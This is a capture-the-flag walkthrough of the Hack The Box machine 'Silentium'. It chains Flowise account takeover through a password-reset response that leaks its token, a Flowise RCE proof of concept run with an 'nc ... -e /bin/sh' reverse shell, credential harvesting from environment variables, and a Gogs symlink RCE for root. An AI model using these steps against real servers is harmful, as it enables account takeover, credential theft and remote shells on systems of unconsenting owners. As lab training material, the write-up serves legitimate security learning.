htb silentium machine (easy)
user flag
$ sudo nmap -sS -sV silentium.htb Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-22 18:19 +0100 Nmap scan report for silentium.htb (10.129.43.204) Host is up (0.16s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.24.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ ffuf -u http://silentium.htb -H "Host: FUZZ.silentium.htb" -w ~/Downloads/subdomains-top1million-5000.txt -fc 301
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://silentium.htb
:: Wordlist : FUZZ: /home/coutinho/Downloads/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.silentium.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
staging [Status: 200, Size: 3142, Words: 789, Lines: 70, Duration: 45ms]
:: Progress: [5000/5000] :: Job [1/1] :: 628 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
edit /etc/hosts and put in the new subdomain
In the subdomain, we can find an Flowise AI instance.
POST /api/v1/account/forgot-password
{"user":{"email":"ben@silentium.htb"}}
response:
{
"user": {
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"name": "admin",
"email": "ben@silentium.htb",
"credential": "$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG",
"tempToken": "QYxOfsedo3OUaCIA6vdJ751bDUtqWEOrOF4l8VP9V1oIBEtSpDsg4sU8Y8zgboMa",
"tokenExpiry": "2026-04-22T16:27:09.228Z",
"status": "active",
"createdDate": "2026-01-29T20:14:57.000Z",
"updatedDate": "2026-04-22T16:12:09.000Z",
"createdBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"updatedBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73"
},
"organization": {},
"organizationUser": {},
"workspace": {},
"workspaceUser": {},
"role": {}
}
POST /api/v1/account/reset-password
{"user":{"email":"ben@silentium.htb","tempToken":"QYxOfsedo3OUaCIA6vdJ751bDUtqWEOrOF4l8VP9V1oIBEtSpDsg4sU8Y8zgboMa","password":"Pelel3123!"}}
response:
{
"user": {
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"name": "admin",
"email": "ben@silentium.htb",
"credential": "$2a$05$kXTSM4369yzG2JxSh88Hn.UnCAl9GEHejA0Tklb.HOZpWaxQfwDVq",
"tempToken": "",
"tokenExpiry": null,
"status": "active",
"createdDate": "2026-01-29T20:14:57.000Z",
"updatedDate": "2026-04-22T16:13:29.000Z",
"createdBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"updatedBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73"
},
"organization": {},
"organizationUser": {},
"workspace": {},
"workspaceUser": {},
"role": {}
}
login with the new password.
Now RCE exploit on an authenticated user in Flowise AI:
https://github.com/r3nsi15/Flowise-RCE-CVE-2025-59528
$ python3 CVE-2025-59528_POC.py -e "ben@silentium.htb" -i "http://staging.silentium.htb" -p "Pelel3123!" -c "nc 10.10.16.78 4444 -e /bin/sh"
[+] Logged in
We get a root shell on the docker container running the application.
env
FLOWISE_PASSWORD=F1l3_d0ck3r
ALLOW_UNAUTHORIZED_CERTS=true
NODE_VERSION=20.19.4
HOSTNAME=c78c3cceb7ba
YARN_VERSION=1.22.22
SMTP_PORT=1025
SHLVL=3
PORT=3000
HOME=/root
OLDPWD=/
SENDER_EMAIL=ben@silentium.htb
PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser
JWT_ISSUER=ISSUER
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
LLM_PROVIDER=nvidia-nim
SMTP_USERNAME=test
SMTP_SECURE=false
JWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200
FLOWISE_USERNAME=ben
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DATABASE_PATH=/root/.flowise
JWT_TOKEN_EXPIRY_IN_MINUTES=360
JWT_AUDIENCE=AUDIENCE
SECRETKEY_PATH=/root/.flowise
PWD=/root
SMTP_PASSWORD=r04D!!_R4ge
NVIDIA_NIM_LLM_MODE=managed
SMTP_HOST=mailhog
JWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
SMTP_USER=test
By running a simple env command, we can see a password in the SMTP_PASSWORD environment variable with value r04D!!_R4ge. I tested it as the ssh connection password for the ben user and it worked and I got the user flag.
root flag
running linpeas inside machine, we see many ports open:
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:46051 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8025 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1025 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
a new subdomain staging-v2-code.dev.silentium.htb appears:
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr 2 13:31 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Apr 2 13:31 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Jan 29 20:02 /etc/nginx/sites-enabled/staging -> /etc/nginx/sites-available/staging
server {
listen 80;
listen [::]:80;
server_name staging.silentium.htb;
location / {
proxy_pass http://127.0.0.1:3000;
}
}
lrwxrwxrwx 1 root root 42 Jan 29 21:29 /etc/nginx/sites-enabled/staging-v2-code -> /etc/nginx/sites-available/staging-v2-code
server {
listen 80;
server_name staging-v2-code.dev.silentium.htb;
location / {
proxy_pass http://127.0.0.1:3001;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
which is running a service called gogs, with root privileges:
ben@silentium:/tmp$ ps aux | grep gogs
root 1494 0.0 1.8 1812308 72880 ? Ssl 17:24 0:01 /opt/gogs/gogs/gogs web
The following repository contains an rce exploit:
https://github.com/Ghxstsec/CVE-2025-8110
The python script needed to be changed in lines 52-54 to put the correct user and token values. this can be done by registering a user on the platform and go to http://staging-v2-code.dev.silentium.htb/user/settings/applications and get an access token.
$ python3 CVE-2025-8110-RCE.py -u "http://staging-v2-code.dev.silentium.htb" -lh 10.10.16.78 -lp 4444 -p "pelele"
_____ _____ _____
/ ____| __ \ / ____|
| | __| |__) | | __
| | |_ | _ /| | |_ |
| |__| | | \ \| |__| |
\_____|_| \_\\_____|
CVE-2025-8110 - Gogs Remote Code Execution
Authenticated RCE via Symlink + sshCommand Injection
Author : ghxtsec
Based on: zAbuQasem original PoC
------------------------------------------------
[+] Login exitoso
Repo creation status: 201
[+] Repo creado: 5f9bc5daa98d
Clonando con URL: http://pelele:pelele@staging-v2-code.dev.silentium.htb/pelele/5f9bc5daa98d.git
[master 909a3eb] Add malicious symlink
1 file changed, 1 insertion(+)
create mode 120000 malicious_link
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 16 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 291 bytes | 291.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
To http://staging-v2-code.dev.silentium.htb/pelele/5f9bc5daa98d.git
a4a9d90..909a3eb master -> master
[+] Symlink subido y pusheado correctamente
starting a listener like
nc -lvnp 4444
receive the reverse shell and cat the root flag